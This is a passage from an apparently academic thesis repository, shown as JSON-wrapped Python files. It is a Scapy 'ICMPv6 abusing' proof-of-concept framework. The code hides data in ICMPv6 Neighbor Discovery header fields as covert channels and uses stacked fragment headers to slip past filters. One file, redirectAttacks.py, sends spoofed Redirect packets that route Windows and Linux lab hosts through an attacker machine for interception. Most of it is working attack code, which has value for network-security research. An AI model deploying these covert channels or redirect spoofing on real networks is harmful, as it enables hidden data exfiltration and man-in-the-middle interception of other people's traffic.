ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataId:\n data = self.nameId+dataId\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthId, self.nameId)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketId(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, 
iface=exitIface, verbose=False)\n elif dataSeq:\n data = self.nameSeq+dataSeq\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthSeq, self.nameSeq)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketSeq(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataData:\n data = self.nameData+dataData\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthData, self.nameData)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketData(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass RouterSolicitationCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthRes = 4\n self.nameCode = 'Router Solicitation code '\n self.nameRes = 'Router Solicitation reserved '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RS(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RS(code=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RS(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RS(res=chunk)]\n \n def execModule(self, dataCode, dataRes, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass RouterAdvertisementCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthCurHopLimit = 1\n self.bandwidthM = 1\n self.bandwidthO = 1\n self.bandwidthH = 1\n self.bandwidthPrf = 1\n self.bandwidthP = 1\n self.bandwidthRes = 1\n self.bandwidthRouterLifeTime = 2\n self.bandwidthReachTime = 4\n self.bandwidthRetransTimer = 4\n self.nameCode = 'Router Advertisement code '\n self.nameCurHopLimit = 'Router Advertisement Cur Hop Limit '\n self.nameM = 'Router Advertisement M '\n self.nameO = 'Router Advertisement O '\n self.nameH = 'Router Advertisement H '\n self.namePrf = 'Router Advertisement Prf '\n self.nameP = 'Router Advertisement P '\n self.nameRes = 'Router Advertisement reserved '\n self.nameRouterLifeTime = 'Router Advertisement router life time '\n self.nameReachTime = 'Router Advertisement reachable time '\n self.nameRetransTimer = 'Router Advertisement retrans timer '\n\n #set routerlifetime for all, default is 1800 and the receiver is not happy\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=chunk, routerlifetime=0)]\n\n def buildPacketCurHopLimit(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(chlim=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(chlim=chunk, routerlifetime=0)]\n\n def buildPacketM(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=1, M=chunk, 
routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=1, M=chunk, routerlifetime=0)]\n\n def buildPacketO(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=2, O=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=2, O=chunk, routerlifetime=0)]\n\n def buildPacketH(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=3, H=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=3, H=chunk, routerlifetime=0)]\n\n def buildPacketPrf(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=4, prf=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=4, prf=chunk, routerlifetime=0)]\n\n def buildPacketP(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=5, P=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=5, P=chunk, routerlifetime=0)]\n \n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(code=6, res=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(code=6, res=chunk, routerlifetime=0)]\n\n def buildPacketRouterLifeTime(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(routerlifetime=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(routerlifetime=chunk)]\n\n def buildPacketReachTime(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(reachabletime=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(reachabletime=chunk, routerlifetime=0)]\n\n def buildPacketRetransTimer(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(retranstimer=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(retranstimer=chunk, routerlifetime=0)]\n \n def execModule(self, dataCode, dataChlim, dataM, dataO, dataH, dataPrf, dataP, dataRes, dataRouterLifeTime, dataReachTime, dataRetransTimer, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataChlim:\n data = self.nameCurHopLimit+dataChlim\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCurHopLimit, self.nameCurHopLimit)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCurHopLimit(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataM:\n data = self.nameM+dataM\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthM, self.nameM)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketM(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataO:\n data = self.nameO+dataO\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthO, self.nameO)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketO(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataH:\n data = self.nameH+dataH\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthH, self.nameH)\n for chunk in 
sendingBuffer:\n packetContainer = self.buildPacketH(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataPrf:\n data = self.namePrf+dataPrf\n sendingBuffer = HelperClass.chunkPackets2Bit(data, self.bandwidthPrf, self.namePrf)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPrf(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataP:\n data = self.nameP+dataP\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthP, self.nameP)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketP(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets2Bit(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRouterLifeTime:\n data = self.nameRouterLifeTime+dataRouterLifeTime\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRouterLifeTime, self.nameRouterLifeTime)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRouterLifeTime(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataReachTime:\n data = self.nameReachTime+dataReachTime\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthReachTime, self.nameReachTime)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketReachTime(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRetransTimer:\n data = self.nameRetransTimer+dataRetransTimer\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRetransTimer, self.nameRetransTimer)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRetransTimer(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass NeighborSolicitationCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthRes = 4\n self.bandwidthTargetAdr = 16\n self.nameCode = 'Neighbor Solicitation code '\n self.nameRes = 'Neighbor Solicitation reserved '\n self.nameTargetAdr = 'Neighbor Solicitation target address '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(code=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(res=chunk)]\n\n def buildPacketTargetAdr(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(tgt=chunk)]\n\n def execModule(self, dataCode, dataRes, dataTargetAdr, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = 
self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataTargetAdr:\n data = self.nameTargetAdr+dataTargetAdr\n sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAdr, self.nameTargetAdr)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketTargetAdr(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False) \n\n \nclass NeighborAdvertisementCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthR = 1\n self.bandwidthS = 1 \n self.bandwidthO = 1\n #able to manage only multiple of 8 - reserved field is 29\n self.bandwidthRes = 3\n self.bandwidthTargetAddress = 16\n self.nameCode = 'Neighbor Advertisement code '\n self.nameR = 'Neighbor Advertisement R '\n self.nameS = 'Neighbor Advertisement S '\n self.nameO = 'Neighbor Advertisement O ' \n self.nameRes = 'Neighbor Advertisement reserved '\n self.nameTargetAddress = 'Neighbor Advertisement target address '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=chunk)]\n\n def buildPacketR(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=1, R=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=1, R=chunk)]\n\n def buildPacketS(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=2, S=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=2, S=chunk)]\n\n def buildPacketO(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=3, O=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=3, O=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(res=chunk)]\n\n def buildPacketTargetAddress(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(tgt=chunk)]\n \n def execModule(self, dataCode, dataR, dataS, dataO, dataRes, dataTargetAddress, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataR:\n data = self.nameR+dataR\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthR, self.nameR)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketR(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataS:\n data = self.nameS+dataS\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthS, self.nameS)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketS(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataO:\n data = self.nameO+dataO\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthO, self.nameO)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketO(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = 
self.nameRes+dataRes\n            sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketRes(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False)\n        elif dataTargetAddress:\n            data = self.nameTargetAddress+dataTargetAddress\n            sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAddress, self.nameTargetAddress)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketTargetAddress(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False)\n\n    \nclass RedirectCovert:\n\n    def __init__(self, frag):\n        self.fragmentation = frag\n        self.bandwidthCode = 1\n        self.bandwidthRes = 4\n        self.bandwidthTargetAdr = 16\n        self.bandwidthDestAdr = 16\n        self.nameCode = 'Redirect code '\n        self.nameRes = 'Redirect reserved '\n        self.nameTargetAdr = 'Redirect target address '\n        self.nameDestAdr = 'Redirect destination address '\n\n    def buildPacketCode(self, chunk, ipAdr):\n        if self.fragmentation:\n            return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(code=chunk))\n        else:\n            return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(code=chunk)]\n\n    def buildPacketRes(self, chunk, ipAdr):\n        if self.fragmentation:\n            return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(res=chunk))\n        else:\n            return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(res=chunk)]\n\n    def buildPacketTargetAdr(self, chunk, ipAdr):\n        if self.fragmentation:\n            return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(tgt=chunk))\n        else:\n            return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(tgt=chunk)]\n\n    def buildPacketDestAdr(self, chunk, ipAdr):\n        #the chunk is carried in the destination address field (dst), not the target field\n        if self.fragmentation:\n            return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(dst=chunk))\n        else:\n            return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(dst=chunk)]\n    \n    def execModule(self, dataCode, dataRes, dataTargetAdr, dataDestAdr, exitIface, ipAdr):\n        if dataCode:\n            data = self.nameCode+dataCode\n            sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketCode(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False)\n        elif dataRes:\n            data = self.nameRes+dataRes\n            sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketRes(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False)\n        elif dataTargetAdr:\n            data = self.nameTargetAdr+dataTargetAdr\n            sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAdr, self.nameTargetAdr)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketTargetAdr(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False)\n        elif dataDestAdr:\n            data = self.nameDestAdr+dataDestAdr\n            sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthDestAdr, self.nameDestAdr)\n            for chunk in sendingBuffer:\n                packetContainer = self.buildPacketDestAdr(chunk, ipAdr)\n                for packet in packetContainer:\n                    send(packet, iface=exitIface, verbose=False) \n\n    \nclass HelperClass:\n\n    @classmethod\n    def chunkPackets(self, data, maxPacketSize, messageAndField):\n        print '[*] %s' % messageAndField \n        print '[*] bandwidth %d' % maxPacketSize\n        sendingBuffer = []\n        chunkNumber = 0\n        print '[*] size of data %d' % len(data)\n        chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n        for tmpChunk in chunks:\n            
chunkNumber += 1\n            tmpBit = BitArray()\n            for c in tmpChunk:\n                bit = BitArray(uint=ord(c), length=8)\n                tmpBit.append(bit)\n            sendingBuffer.append(int(tmpBit.bin, 2))\n        print '[*] chunks %d' % chunkNumber\n        return sendingBuffer\n\n    @classmethod\n    def chunkPacketsBit(self, data, maxPacketSize, messageAndField):\n        print '[*] %s' % messageAndField\n        maxP = float(format(maxPacketSize, '.2f'))/8\n        print '[*] bandwidth %s' % format(maxP, '.2f')\n        sendingBuffer = []\n        chunkNumber = 0\n        print '[*] size of data %d' % len(data)\n        chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n        for tmpChunk in chunks:\n            for c in tmpChunk:\n                bits = BitArray(uint=ord(c), length=8)\n                for bit in bits.bin:\n                    chunkNumber += 1\n                    sendingBuffer.append(int(bit))\n        print '[*] chunks %d' % chunkNumber\n        return sendingBuffer\n\n    @classmethod\n    def chunkPackets2Bit(self, data, maxPacketSize, messageAndField):\n        print '[*] %s' % messageAndField\n        maxP = float(format(maxPacketSize, '.2f'))/8*2\n        print '[*] bandwidth %s' % format(maxP, '.2f')\n        sendingBuffer = []\n        chunkNumber = 0\n        print '[*] size of data %d' % len(data)\n        chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n        for tmpChunk in chunks:\n            for c in tmpChunk:\n                bits = BitArray(uint=ord(c), length=8)\n                for bit in range(0, len(bits.bin), 2):\n                    chunkNumber += 1\n                    sendingBuffer.append(int(bits.bin[bit:(bit+2)], 2))\n        print '[*] chunks %d' % chunkNumber\n        return sendingBuffer\n    \n    @classmethod\n    def chunkPacketsToAddress(self, data, maxPacketSize, messageAndField):\n        print '[*] %s' % messageAndField \n        print '[*] bandwidth %d' % maxPacketSize\n        sendingBuffer = []\n        chunkNumber = 0\n        print '[*] size of data %d' % len(data)\n        chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n        for tmpChunk in chunks:\n            tmpSendingBuffer = ''\n            chunkNumber += 1\n            for c in range(0, len(tmpChunk), 2):\n                try:\n                    tmpBit = BitArray()\n                    firstElement = tmpChunk[c]\n                    firstInt = ord(firstElement)\n                    firstBit = BitArray(uint=firstInt, length=8)\n                    if c < (len(tmpChunk)-1):\n                        secondElement = tmpChunk[c+1]\n                        secondInt = ord(secondElement)\n                        secondBit = BitArray(uint=secondInt, length=8)\n                        tmpBit.append(firstBit + secondBit)\n                    else:\n                        tmpBit.append(firstBit)\n                    #print \"[*] tmpBit in hex is %s\" % str(hex(int(tmpBit.bin, 2)))\n                    if c < (len(tmpChunk)-2):\n                        tmpSendingBuffer += str(tmpBit.hex) + ':'\n                    elif (c/2+1) < 7:\n                        tmpSendingBuffer += str(tmpBit.hex) + '::1'\n                    elif (c/2+1) == 7:\n                        tmpSendingBuffer += str(tmpBit.hex) + ':1'\n                    else:\n                        tmpSendingBuffer += str(tmpBit.hex)\n                except TypeError:\n                    print \"Error chunking %s%s\" % (firstElement, secondElement)\n                try:\n                    #print \"[*] tmpSendingBuffer is %s\" % tmpSendingBuffer\n                    sendingBuffer.append(tmpSendingBuffer)\n                except:\n                    print \"[*] error appending buffer\"\n        print '[*] chunks %d' % chunkNumber\n        return sendingBuffer\n\n    @classmethod\n    def fragmentPacket(self, ipAdr, message):\n        packetContainer = []\n        ipv6_1 = IPv6(dst=ipAdr)\n        ipv6_2 = IPv6(dst=ipAdr)\n        icmpv6 = message\n        payload = \"xxxxxxxx\"\n        frag = ipv6_1/IPv6ExtHdrFragment(nh=44)/payload\n        icmp1 = ipv6_2/IPv6ExtHdrFragment(nh=58)/icmpv6\n        icmp2 = ipv6_2/IPv6ExtHdrFragment(nh=58)/payload\n        ## for p in range(0, 10):\n        ##     packetContainer.append(ipv6_1/IPv6ExtHdrFragment(offset=p,m=1,nh=44))\n        ## packetContainer.append(ipv6_2/IPv6ExtHdrFragment(offset=10,m=0,nh=58)/icmpv6)\n        packet = 
fragment6(ipv6_1/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment(nh=58)/icmpv6, 80)\n        for p in packet:\n            packetContainer.append(p)\n        return packetContainer\n\n    @classmethod\n    def receiver(self, iface, adr):\n        rec = Receiver(iface, adr)\n        rec.receive()\n" }, { "alpha_fraction": 0.6139564514160156, "alphanum_fraction": 0.6658130884170532, "avg_line_length": 41.79452133178711, "blob_id": "f7808eaeb9a1f4cbd5c8ce90782eee24010c1e77", "content_id": "9b51da779235269e52ceb61f52ceba541b1d8021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3124, "license_type": "no_license", "max_line_length": 154, "num_lines": 73, "path": "/python/code/redirectAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\n\n\"\"\"\nthis class builds ND Redirect messages\n\"\"\"\nclass Redirect:\n    \n    def __init__(self):\n        self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n        self.linuxMac = \"08:00:27:84:bb:37\"\n        self.linkLinux = \"fe80::a00:27ff:fe84:bb37\"\n        self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.firewall = \"2001:abcd:acad:2::1\"\n        self.linkFirewall = \"fe80::1\"\n        self.prefix = \"2001:abcd:acad:2:\"\n        self.attacking = \"2001:abcd:acad:1::2\"\n        self.attackingMac = \"b8:27:eb:aa:31:e5\"\n        self.externalAdr = \"2001:abcd:acad:1::15\"\n        self.adrList = Set()\n        print 'Redirect'\n\n    def buildPacketInternal(self, ipAdr, mac, tgtLinkLocal):\n        chksum = int(\"ace1\",16)\n        identifier = int(\"0001\",16)\n        data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n        targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n        redirHeader = ICMPv6NDOptRedirectedHdr(pkt=IPv6(dst=self.firewall,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=identifier,seq=1,cksum=chksum)/data)\n        return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_Redirect(tgt=tgtLinkLocal,dst=self.firewall)/targetLinkLayer/redirHeader\n\n    def buildPacketRemote(self, ipAdr):\n        chksum = int(\"f82a\",16)\n        identifier = int(\"0001\",16)\n        data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n        targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=self.attackingMac)\n        redirHeader = ICMPv6NDOptRedirectedHdr(pkt=IPv6(dst=self.externalAdr,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=identifier,seq=1,cksum=chksum)/data)\n        return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_Redirect(tgt=self.attacking,dst=self.externalAdr)/targetLinkLayer/redirHeader\n\n    \n    def execModuleInternalWin(self, exitIface):\n        #this is to induce windows to disclose its temp adr\n        pingWindows = IPv6(dst=self.win)/ICMPv6EchoReply()\n        send(pingWindows, iface=exitIface, verbose=False)\n        #the sniffer eventually grabs the win tmp adr\n        self.receiver(exitIface)\n        print self.adrList\n        for adr in self.adrList:\n            packetContainer = self.buildPacketInternal(adr, self.linuxMac, self.linkLinux)\n            for t in range(1,500):\n                send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleRemoteWin(self, exitIface):\n        packetContainer = self.buildPacketRemote(self.win)\n        for t in range(1,500):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleRemoteLinux(self, exitIface):\n        packetContainer = self.buildPacketRemote(self.linux)\n        for t in range(1,500):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def packet_callback(self, packet):\n        if IPv6 in packet[0]:\n            adr = packet[IPv6].dst\n            print 
adr\n if self.prefix in adr and not adr == self.linux:\n self.adrList.add(adr) \n\n #the sniffer for the internal Mitm NA attack\n def receiver(self, iFace):\n sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n" }, { "alpha_fraction": 0.5673027038574219, "alphanum_fraction": 0.5740072131156921, "avg_line_length": 27.101449966430664, "blob_id": "5f162b18335ce8eaa8a5833936852e0fd1dbce40", "content_id": "eec32022f082578af19a461bb1bd74abccbbcb7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1939, "license_type": "no_license", "max_line_length": 87, "num_lines": 69, "path": "/python/code/icmpv6.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport optparse\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom modules import *\nimport logging\n\n\"\"\"\nclass responsible for framework initialization\nit shows a command prompt, has tab completion and history of commands\n\"\"\"\nclass ICMPv6:\n\n def __init__(self, iface):\n self.commandBuffer = []\n self.iface = iface\n logging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\n\n #shows the logo of the framework\n def startupLogo(self):\n initLogo = [80*'*', '', '\\t\\t\\tICMPv6 abusing - Proof of Concept', '', 80*'*']\n for line in initLogo:\n print line\n\n #starts the interactive prompt\n def startSystem(self):\n os.system('clear')\n self.startupLogo()\n Commands.setMainHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input('[]>')\n #commands\n if re.match('help', command):\n self.showHelp()\n elif re.match('quit', command):\n running = 0\n sys.exit(1)\n elif re.match(r'testing', command):\n module = TestingFramework(self.iface)\n module.startSystem()\n else:\n print 'Error! 
Command not found!'\n \n def showHelp(self):\n for entry in Help.getMainHelp():\n print entry\n\ndef main():\n parser = optparse.OptionParser(\"usage: %prog -i <interface>\")\n parser.add_option('-i', dest='iface', type='string', help='specify exit interface')\n (options, args) = parser.parse_args()\n iface = options.iface\n if(iface == None):\n print parser.usage\n exit(0)\n else:\n icmpv6 = ICMPv6(iface)\n icmpv6.startSystem()\n \nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.671600341796875, "alphanum_fraction": 0.7091813087463379, "avg_line_length": 52.345680236816406, "blob_id": "ecc61a00641237008265d313abbfb11b5fe338cd", "content_id": "bbc342b1a0dec7a254cf47793684e0b3192c7b0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8648, "license_type": "no_license", "max_line_length": 168, "num_lines": 162, "path": "/python/code/destinationUnreach.py~", "repo_name": "antekirtt/thesis", 